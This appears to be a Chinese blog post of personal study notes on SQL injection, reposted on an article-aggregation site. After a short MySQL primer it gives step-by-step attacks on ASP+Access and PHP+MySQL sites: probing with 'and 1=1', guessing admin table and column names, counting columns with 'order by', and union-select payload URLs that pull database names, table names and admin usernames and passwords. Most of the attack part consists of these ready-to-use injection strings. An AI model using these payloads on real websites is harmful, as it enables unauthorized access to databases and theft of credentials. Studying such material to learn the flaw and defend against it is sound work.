SQL注入学习报告

作者: 灭霸_ | 来源:发表于2018-02-01 17:28 被阅读0次

SQL注入学习报告
web常见漏洞的成因和修复
web安全之SQL注入
笔记：web漏洞
谈谈sql注入之原理和防护（－）
小迪16期-20170226
第四章 SQL 注入
一步一步学习 Web 安全 2.4 union 联合查询注入
无处不在的SQL注入
PHP代码安全之SQL注入

SQL注入核心思想：在正常需要调用数据库数据的URL后面构造一段数据库查询代码，然后根据返回的结果，获得某些想要的数据。

（1）MySQL基本操作：

select version(); 查看数据库版本

select user(); 查看数据库当前用户

select database(): 查看当前数据库

show database; 查看MySQL中包含哪些数据库

show tables; 查看数据库中的表名

（2）select 查询：

select *from 表; ---显示表中的所有记录

select *from 表 where id=1; ---显示表中id为1的记录 where后面为查询条件

select 字段1，字段2 from 表 where id=1; ---只显示表中id=1的字段1，字段2

select from *表 where=1 and name="admin" ---显示表中同时满足id=1 name="admin"的记录

select from *表 where=1 or name="admin" ---显示表中满足id=1 或者 name="admin"的记录

select from *表 order by id; 按照表中id字段来排序

（3）union select 联合查询：

使用union可以进行联合查询,一次性执行两个或者多个查询，并将查询结果一并显示

注意点：联合查询中列数必须相同

假设：表1有2个字段，表2有3个字段

select *from 表1 union select *from 表2 ---报错，字段不匹配

select *from 表1 union select name,age from 表2 ---正常查询

select *from 表2 union select 1,id,name from 表1 ---正常查询

ASP+ACCESS注入

注意：asp+access注入中，表名，字段名，有多少字段全都要靠猜的= =。。简而言之。就是要靠经验猜！也可以借助一些工具里的字典

步骤1：判断注入点在疑似有注入点的页面后面加入 and 1=1 和 and 1=2 如果and1=1为正常显示，and 1=2 显示异常则有SQL注入

步骤2：猜解表名使用exists()函数

EXISTS(包括 NOT EXISTS )子句的返回值是一个BOOL值。 EXISTS内部有一个子查询语句(SELECT ... FROM...)，我将其称为EXIST的内查询语句。其内查询语句返回一个结果集。 EXISTS子句根据其内查询语句的结果集空或者非空，返回一个布尔值。

一种通俗的可以理解为：将外查询表的每一行，代入内查询作为检验，如果内查询返回的结果取非空值，则EXISTS子句返回TRUE，这一行行可作为外查询的结果行，否则不能作为结果。

http://www.xxx.com/table.asp?id=16 and exists(select *from admin)

常见表名如：admin user adminuser manage mannager

步骤3：猜解字段名同步骤2

http://www.xxx.com/table.asp?id=16 and exists(select name from admin)

常见字段名：

账号：name username user_name admin adminuser admin_user admin_username adminname

密码：password pass userpass user_pass pwd userpwd adminpwd admin_pwd

步骤4：猜解字段数量

http://www.xxx.com/table.asp?id=16 order by 20

order by 在SQL注入中不仅仅是作为排序更大的作用是猜解字段的数量，如果order 20显示正常即说明表中的字段大于等于20

建议二分猜解，比如20显示异常就猜10 如果10显示正常则说明表中字段在10-20之间依次猜解

步骤5：爆出字段内容

http://www.xxx.com/table.asp?id=16 union select 1,username,password,4,5,6,7,8,9,10 from admin

在步骤4中我们猜解出字段数量后，会爆出内容显示的位置（这里是2，3）在2，3位置用字段名代替会爆出内容，到这里我们的一次asp+access注入就完成了

PHP+MySQL注入

与asp+access不同的是：在5.0以后的MySQL中存在一个元数据库information_schem，其中存储着用户在MySQL中创建的所有其它数据库的信息。在对PHP+MySQL类网站进行注入时，主要就是针对information_schema数据库进行操作。

information_schema中比较重要的数据表：

schemata：用于存放所有数据库的名字

tables：用于存放所有数据库中的数据表的名字

columns：用于存放所有数据库的所有数据表中的所有字段的名字

步骤1:同上用and 1=1 或者 and 1=2 判断注入点，基本上sql注入第一步都是寻找注入点

步骤2：用order by判断字段的数量

http://www.xxx.com/tables.php?id=142 order by 10

步骤3：联合查询

http://www.xxx.com/tables.php?id=12 union select 1,2,3,4,5

不同于access注入的是不用在查询语句中指定数据表名

如果页面有显示正常数据的地方占据了我们爆敏感数据的位置可以这样修改

http://www.xxx.com/tables.php?id=12 and 1=2 union select 1,2,3,4,5

这样我们就可以看到可显字段

步骤4：爆出用MySQL函数爆出敏感信息

http://www.xxx.com/tables.php?id=12 and 1=2 union select 1,user(),database(),4,5

这样我们就爆出了用户名跟数据库名，接下来去元数据库information_schema里去查找了

http://www.xxx.com/tables.php?id=12 and 1=2 union select 1,table_name,3,4,5 from information_schema.tables where table_schema="databasename"

table_name会爆出表名继续爆出字段名

http://www.xxx.com/tables.php?id=12 and 1=2 union select 1,column_name,3,4,5 from information_schema.columns where table_name="tablename"

最后爆出用户名跟密码就哦了~

http://www.xxx.com/tables.php?id=12 and 1=2 union select 1,username,password,4,5 from tablename

ok~这就是php+mysql的注入

网友评论

本文标题：SQL注入学习报告

本文链接：https://www.haomeiwen.com/subject/pqqdzxtx.html

延伸阅读

深度阅读

您也可以注册成为美文阅读网的作者，发表您的原创作品、分享您的心情！

SQL注入学习报告

ASP+ACCESS注入

PHP+MySQL注入

相关文章